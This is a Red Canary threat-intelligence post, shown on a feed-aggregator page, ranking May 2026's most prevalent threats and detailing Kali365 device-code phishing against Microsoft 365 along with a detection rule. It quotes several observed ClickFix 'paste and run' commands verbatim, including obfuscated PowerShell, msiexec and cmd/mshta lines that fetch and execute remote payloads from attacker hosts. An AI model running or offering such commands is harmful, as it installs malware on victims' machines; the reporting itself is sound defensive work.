惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
Cyberwarzone
Cyberwarzone
The GitHub Blog
The GitHub Blog
云风的 BLOG
云风的 BLOG
P
Proofpoint News Feed
小众软件
小众软件
Recent Announcements
Recent Announcements
博客园 - 三生石上(FineUI控件)
Security Archives - TechRepublic
Security Archives - TechRepublic
W
WeLiveSecurity
Cloudbric
Cloudbric
博客园 - 司徒正美
美团技术团队
N
News and Events Feed by Topic
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
PCI Perspectives
PCI Perspectives
宝玉的分享
宝玉的分享
H
Help Net Security
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Google DeepMind News
Google DeepMind News
Help Net Security
Help Net Security
Last Week in AI
Last Week in AI
S
Schneier on Security
N
News | PayPal Newsroom
B
Blog RSS Feed
L
LINUX DO - 最新话题
T
Troy Hunt's Blog
S
Secure Thoughts
雷峰网
雷峰网
aimingoo的专栏
aimingoo的专栏
L
Lohrmann on Cybersecurity
G
Google Developers Blog
Microsoft Azure Blog
Microsoft Azure Blog
Hacker News - Newest:
Hacker News - Newest: "LLM"
T
Tenable Blog
S
Securelist
L
LangChain Blog
Recent Commits to openclaw:main
Recent Commits to openclaw:main
I
InfoQ
H
Heimdal Security Blog
Cisco Talos Blog
Cisco Talos Blog
F
Full Disclosure
Y
Y Combinator Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
K
Kaspersky official blog
T
Tailwind CSS Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
阮一峰的网络日志
阮一峰的网络日志
C
Cisco Blogs

Red Canary

Train, triage, repeat: The AI agent changing how we fight phishing | Red Canary The dual-use dilemma: Rethinking detection for remote access tool abuse | Red Canary How threat hunting evolves at scale Investigating suspicious AI workflows in Microsoft Entra Agent ID: Assistive agents Red Canary CFP tracker: May 2026 Investigating suspicious AI workflows in Microsoft Entra Agent ID: Agent’s user account Grading on a curve: How to assess a pentest Investigating suspicious AI workflows in Microsoft Entra Agent ID: Autonomous agents Intelligence Insights: May 2026 Investigating server compromises with cgroups: A Linux DFIR primer Spring cleaning your browser Red Canary CFP tracker: May 2026 How AI can streamline your security testing Intelligence Insights: April 2026 Identity, browsers, and node.js: Everything you missed in the Threat Detection Report miniseries New: Use response actions to update Zscaler policies and block threats AI in cybersecurity: The good, the bad, and the FUD Red Canary CFP tracker: April 2026 Scarlet Goldfinch’s year in ClickFix Intelligence Insights: March 2026 AI and browser threats stand out in the 2026 Threat Detection Report Moving up the Assemblyline: Exposing malicious code in browser extensions The RSAC 2026 Conference talks worth catching Hunting for malicious OpenClaw AI in the modern enterprise Breaking down a supply chain attack leveraging a malicious Google Workspace OAuth app Red Canary CFP tracker: March 2026
Intelligence Insights: June 2026 | Red Canary
Chris Brook · 2026-06-19 · via Red Canary

Intelligence Insights: June 2026

ClearFake is the clear-cut number one again and Kali365 debuts in this month’s edition of Intelligence Insights

Highlights from May

Coming in at number one on our top 10 most prevalent threat list, for the second month running, is ClearFake. ClearFake is an activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste (aka paste and run, ClickFix, fakeCAPTCHA). This technique remains a very effective and popular initial execution technique—appearing in the delivery and/or execution chain of 7 threats in this month’s top 10:

  • ClearFake
  • MacSync Stealer
  • NetSupport Manager
  • ACR Stealer
  • Atomic Stealer
  • HijackLoader*
  • Scarlet Goldfinch

*This is HijackLoader’s first appearance in the top 10 since September 2025

Since this technique is widely used by a variety of adversaries, the command lines and parent processes also vary a lot more than when paste and run first gained widespread use. Here are some recent examples we saw in May 2026:

Associated threatPaste and run command
Associated threat:Paste and run command:

curl -fsS -4 --connect-timeout 5 --max-time 10 -X POST -H user: Qm7AzR1xBy9KpLs4DvTM_8Hc6Nj-G2fUe3Wo5YtXaI -H BuildID: b4n7QxHoDVLmTY9kEZjAr2Fcuw8zgpivl3Xy-s6tRN hxxps://amber-22[.]com/api/metrics/run?event=pasted

Associated threat:Paste and run command:

"PowerShell.exe" "Write-Host(&{iex(irm(('ccud'+'mcx')+('.x'+'yz/u')))})2>$null" # Security check ✔️ I'm not a robot Verification ID: 138105

Associated threat:Paste and run command:

"C:\WINDOWS\system32\msIeXec.exe" -PAcKᵃGE http://195[.]10[.]205[.]212/Cpcha /Q

Associated threat:Paste and run command:

"cmd.exe" /c s^t^a^r^t "" /min C:\windows\system32\cmd.exe /c "(for /f "delims=" %E in ('echo C:\Users\username\AppData\Local\Voter.pdf') do ^c^u^r^l^ -skLo "%E" 35613analytics[.]com/uuu && ^m^s^h^t^a^ "%E")"

Kali365 makes its debut in 2nd place on our top 10 list. Kali365 is a phishing-as-a-service (PhaaS) platform that automates OAuth device code phishing and adversary-in-the-middle (AitM) session capture attacks targeting Microsoft 365 environments.

Due to overlapping detection signals, we initially tracked this activity as GraphRunner—a post-exploitation toolset for interacting with the Microsoft Graph API that enables reconnaissance, persistence, and data exfiltration from Microsoft Entra ID accounts—which is why GraphRunner appeared on last month’s top 10 list, tied for 6th place. As part of our ongoing research, we identified an increase in Kali365-specific activity and expanded our detection coverage to track observed device code abuse in a more granular way. You can read more about Kali365 below.

TeamPCP reappeared on our top 10 list as part of this month’s tie for 7th. TeamPCP is a sophisticated criminal group conducting coordinated supply chain attacks and cloud-native infrastructure compromises for ransomware deployment, credential harvesting, and coinmining. May’s campaign, dubbed “Mini Shai-Hulud” by researchers, ran a self-propagating worm across npm and PyPI ecosystems, using a malicious TanStack CI workflow commit as their entry point. TanStack did a thorough investigation and shared their findings publicly.

This month’s top 10 threats

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.

Here’s how the numbers shook out for May 2026:

Month's rankThreat nameThreat description
Month's rank:

1

Threat name:Threat description :

Activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste

Month's rank:

2

Threat name:

Kali365

Threat description :

Phishing-as-a-service (PhaaS) platform that automates OAuth device code phishing and adversary-in-the-middle (AitM) session capture attacks targeting Microsoft 365 environments

Month's rank:

3

Threat name:Threat description :

macOS threat designed with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets

Month's rank:

4

Threat name:Threat description :

Legitimate ConnectWise product that administrators use and adversaries abuse to remotely access and manage devices

Month's rank:

5

Threat name:Threat description :

Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access

Month's rank:

6

Threat name:Threat description :

Sophisticated criminal group conducting coordinated supply chain attacks and cloud-native infrastructure compromises for ransomware deployment, credential harvesting, and coinmining

Month's rank:

7*

Threat name:Threat description :

Malware-as-a-Service (MaaS) information stealer written in C++ that has been active since 2024

Month's rank:

7*

Threat name:Threat description :

Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets

Month's rank:

7*

Threat name:Threat description :

Malware loader that uses DLL sideloading to deliver additional payloads through process injection

Month's rank:

7*

Threat name:Threat description :

Red Canary's name for an activity cluster that uses compromised web sites to trick users into executing malicious code

= trending up from previous month
= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Conned and caught: Kali365

In April and May 2026, we observed a significant rise in OAuth device code phishing attempts against Microsoft Entra ID tenants. Device code phishing is not new; we’ve been reporting on it since 2022. This kind of phishing takes advantage of the OAuth device authorization grant, a legitimate authorization flow intended for devices or workflows where input constraints prevent full browser-based authentication. You’re familiar with this pattern if you’ve ever logged into a smart TV, printer, or command line interface (CLI) by entering a short one-time code. The device authorization grant prevents users from directly entering credentials on untrusted devices while taking advantage of multi-factor authentication (MFA), device compliance, and other contextual access controls enforced by the identity provider (IdP). However, offloading authentication to a secondary, trusted device is exactly what makes this an attractive target for adversaries.

The recent increase in device code phishing attempts is largely due to the widespread commoditization of device code abuse by subscription-based phishing-as-a-service (PhaaS) platforms like Kali365, which debuted in our top 10 this month in 2nd place. Kali365 was first publicly reported by Arctic Wolf in April 2026. According to a May 2026 announcement by the FBI, access to the platform is primarily provided via Telegram. Once onboarded, adversaries have access to dedicated tenant environments with customizable UIs, AI-generated phishing lures, and post-exploitation reconnaissance and discovery capabilities.

Kali365 account landing page from Arctic Wolf

Red Canary-observed attack chains follow a similar pattern, starting with delivery of targeted phishing emails impersonating common enterprise applications, with titles like DocuSign – Signature Required: {sender} Requested Your Signature and SharePoint – Document Shared: {sender} Shared a File With You. The emails contain a link to an adversary-controlled URL, typically using free Cloudflare web development infrastructure and related domains, for example workers[.]dev and pages[.]dev.

When the victim clicks the link, they’re taken to a well-formatted, appropriately branded landing page containing both a real-time generated user_code and a link to the legitimate Microsoft authentication portal. If the victim enters the user_code and completes authorization—including the satisfaction of Conditional Access policies—the Kali365 platform collects the returned, valid access token.

These events appear in Entra ID sign-in logs as AuthenticationProtocol:deviceCode and ExtendedProperties.RequestType:Cmsi:Cmsi, typically followed by a refresh token redemption (IncomingTokenType:refreshToken) from a different IP address—a strong indicator of token theft. Authentication events typically originate from Microsoft Office (d3590ed6-52b3-4102-aeff-aad2292ab01c) and target Microsoft Graph (00000003-0000-0000-c000-000000000000).

After gaining initial access, adversaries attempted a variety of actions including:

  • Gaining persistence by changing the victim’s password
  • Registering a new device under adversary control
  • Engaging in business email compromise (BEC) activity like deleting the original phishing email and creating inbox rules to hide emails that might alert the victim to suspicious activity

To protect against potential device code abuse, we recommend implementing Conditional Access policies to:

Red Canary has observed successful Kali365 follow-on activity that is common to business email compromises (BEC), including creating suspiciously-named inbox rules to hide emails that might alert the victim to malicious activity. That gives us a detection opportunity.

Detection opportunity: Identify instances of email rule creation using only special characters for the rule name

This pseudo-detection analytic identifies instances of email rule creation using only special characters for the rule name. Adversaries who have gained access to a mailbox—including those who did so via Kali365—may create an overly simple rule name, like one that only consists of special characters, to avoid drawing suspicion or to move quickly and avoid detection. The rule’s filter conditions will typically target important documents, like legal forms or payroll documents, and/or redirect emails into an unused folder like “Conversation History” or “Deleted Items.” It’s possible a user could do this legitimately to quickly create a rule. If so, they’ll likely have a history of simply-named rules, and the matching filters will typically apply to unimportant items like spam or junk mail.

email_rule_created_or_modified 
&&
email_rule_name_matches ( ^[$@$!%*?&#^\-_. +;,\/:]+$)
2026 Threat Detection Report

Related Articles

Subscribe to our blog